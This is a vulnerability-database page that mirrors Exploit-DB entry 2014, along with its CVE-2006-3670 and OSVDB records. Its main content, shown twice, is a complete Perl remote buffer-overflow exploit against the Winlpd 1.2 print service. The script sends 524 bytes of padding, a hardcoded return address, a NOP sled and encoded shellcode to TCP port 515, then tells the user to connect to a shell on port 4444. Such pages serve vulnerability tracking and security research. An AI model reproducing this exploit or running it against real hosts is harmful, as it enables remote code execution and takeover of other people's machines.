Search...

Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit

2006-07-15T00:00:00

ID EDB-ID:2014
Type exploitdb
Reporter Pablo Isola
Modified 2006-07-15T00:00:00

Description

Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit. CVE-2006-3670. Remote exploit for windows platform

                                        
                                            #!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possibe some problems with WinXP if exploit doesn't
# work correctly, try another number in var 'loop'. 
#
# Buffer size 524 bytes. 
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;  # 51 for Windows 2K and 100 to 120 for Windows XP 
$host = $ARGV[0];
$port = 515;


if (!defined $host){

	print "Error in Params.\n";
	print "Usage: winlpd_exp.pl [host] \n";
	print "Open remote shell on port 4444\n"; 
	exit;
}


print "\nA Remote Buffer Overflow Exploit\n".
"Coded by Pablo Isola - neuquencapital\@hotmail.com\nNeuquen - Patagonia Argentina\n\n";


$sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish
#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish

$ret = "\x77\x74\x81\x77";  # return address
$nop = "\x90" x 16;         # nops for padding
$str = "\x41" x 524 .$ret.$nop.$sc;

$iaddr = inet_aton($host)           || die "Unknown host: $host\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp')      || die "getprotobyname: $!\n";

for ($j=1;$j&lt;$loop;$j++) {
	
	socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
	connect(SOCKET,$paddr) || die "Lost Conection: $! .........ay Carumba?\n";
	send(SOCKET,$str, 0)	|| die "failure sent: $!\n";
	print "\nSending string: ".$j;
#	print "\nview:\n".$str."\n";
	sleep(1);
	close SOCKET;
	sleep(1);
}

print "\n\nTry: telnet remote_ip 4444\n\n".
"To my friend 'Esteban T.' and to all of my friends...you know who you are.\n".
"Have a nice day :)\n\n"; 

# milw0rm.com [2006-07-15]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:2014", "hash": "639b6148bd03b15660f939eeaface62e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit", "description": "Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit. CVE-2006-3670. Remote exploit for windows platform", "published": "2006-07-15T00:00:00", "modified": "2006-07-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2014/", "reporter": "Pablo Isola", "references": [], "cvelist": ["CVE-2006-3670"], "lastseen": "2016-01-31T15:21:11", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T15:21:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3670"]}, {"type": "osvdb", "idList": ["OSVDB:27332"]}], "modified": "2016-01-31T15:21:11"}, "vulnersScore": 7.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2014/", "sourceData": "#!/usr/bin/perl\r\n\r\n####################################################\r\n#\r\n# A proof of concept Remote Buffer Overflow Exploit\r\n#\r\n# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com\r\n#\r\n# Possibe some problems with WinXP if exploit doesn't\r\n# work correctly, try another number in var 'loop'. \r\n#\r\n# Buffer size 524 bytes. \r\n#\r\n# Author: Pablo Isola - neuquencapital@hotmail.com\r\n#\r\n# Neuquen - Patagonia Argentina.\r\n#\r\n# To my friend 'Esteban T.' and all of my friends...\r\n# you know who you are.\r\n#\r\n# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm\r\n####################################################\r\n\r\nuse Getopt::Std;\r\nuse Socket;\r\nmy $SOCKET = \"\";\r\n\r\n$loop = 51; # 51 for Windows 2K and 100 to 120 for Windows XP \r\n$host = $ARGV[0];\r\n$port = 515;\r\n\r\n\r\nif (!defined $host){\r\n\r\n\tprint \"Error in Params.\\n\";\r\n\tprint \"Usage: winlpd_exp.pl [host] \\n\";\r\n\tprint \"Open remote shell on port 4444\\n\"; \r\n\texit;\r\n}\r\n\r\n\r\nprint \"\\nA Remote Buffer Overflow Exploit\\n\".\r\n\"Coded by Pablo Isola - neuquencapital\\@hotmail.com\\nNeuquen - Patagonia Argentina\\n\\n\";\r\n\r\n\r\n$sc = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\";\r\n$sc .= \"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\";\r\n$sc .= \"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\";\r\n$sc .= \"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\";\r\n$sc .= \"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\";\r\n$sc .= \"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\";\r\n$sc .= \"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\";\r\n$sc .= \"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\";\r\n$sc .= \"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\";\r\n$sc .= \"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\";\r\n$sc .= \"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\";\r\n$sc .= \"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\";\r\n$sc .= \"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\";\r\n$sc .= \"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\";\r\n$sc .= \"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\";\r\n$sc .= \"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\";\r\n$sc .= \"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\";\r\n$sc .= \"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\";\r\n$sc .= \"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\";\r\n$sc .= \"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\";\r\n$sc .= \"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\";\r\n$sc .= \"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\";\r\n$sc .= \"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\";\r\n$sc .= \"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\";\r\n$sc .= \"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\";\r\n\r\n#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish\r\n#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish\r\n\r\n$ret = \"\\x77\\x74\\x81\\x77\"; # return address\r\n$nop = \"\\x90\" x 16; # nops for padding\r\n$str = \"\\x41\" x 524 .$ret.$nop.$sc;\r\n\r\n$iaddr = inet_aton($host) || die \"Unknown host: $host\\n\";\r\n$paddr = sockaddr_in($port, $iaddr) || die \"getprotobyname: $!\\n\";\r\n$proto = getprotobyname('tcp') || die \"getprotobyname: $!\\n\";\r\n\r\nfor ($j=1;$j<$loop;$j++) {\r\n\t\r\n\tsocket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die \"socket: $!\\n\";\r\n\tconnect(SOCKET,$paddr) || die \"Lost Conection: $! .........ay Carumba?\\n\";\r\n\tsend(SOCKET,$str, 0)\t|| die \"failure sent: $!\\n\";\r\n\tprint \"\\nSending string: \".$j;\r\n#\tprint \"\\nview:\\n\".$str.\"\\n\";\r\n\tsleep(1);\r\n\tclose SOCKET;\r\n\tsleep(1);\r\n}\r\n\r\nprint \"\\n\\nTry: telnet remote_ip 4444\\n\\n\".\r\n\"To my friend 'Esteban T.' and to all of my friends...you know who you are.\\n\".\r\n\"Have a nice day :)\\n\\n\"; \r\n\r\n# milw0rm.com [2006-07-15]\r\n", "osvdbidlist": ["27332"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Winlpd 1.26 allows remote attackers to execute arbitrary code via a long string in a request to TCP port 515.", "modified": "2018-10-18T16:48:00", "id": "CVE-2006-3670", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3670", "published": "2006-07-18T15:47:00", "title": "CVE-2006-3670", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1016510\n[Secunia Advisory ID:21058](https://secuniaresearch.flexerasoftware.com/advisories/21058/)\nOther Advisory URL: http://foro.elhacker.net/index.php/topic,131756.htm\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0484.html\nKeyword: TCP port 515\nISS X-Force ID: 27759\nGeneric Exploit URL: http://www.milw0rm.com//exploits/2014\nFrSIRT Advisory: ADV-2006-2823\n[CVE-2006-3670](https://vulners.com/cve/CVE-2006-3670)\nBugtraq ID: 19011\n", "modified": "2006-07-15T04:34:02", "published": "2006-07-15T04:34:02", "href": "https://vulners.com/osvdb/OSVDB:27332", "id": "OSVDB:27332", "title": "Winlpd Long Request Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}